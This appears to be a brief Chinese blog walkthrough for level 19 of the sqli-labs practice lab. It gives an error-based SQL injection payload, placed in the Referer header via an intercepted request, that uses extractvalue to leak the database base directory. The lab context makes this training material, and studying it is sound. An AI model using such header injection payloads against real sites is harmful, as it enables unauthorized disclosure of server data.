sqli labs-19

1、和sqli labs-18 一样,当登陆成功后会显示出referer的值。所以直接抓包改变referer的值 1′ and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and ‘1’=’1 直接爆出路径

发表评论

电子邮件地址不会被公开。 必填项已用*标注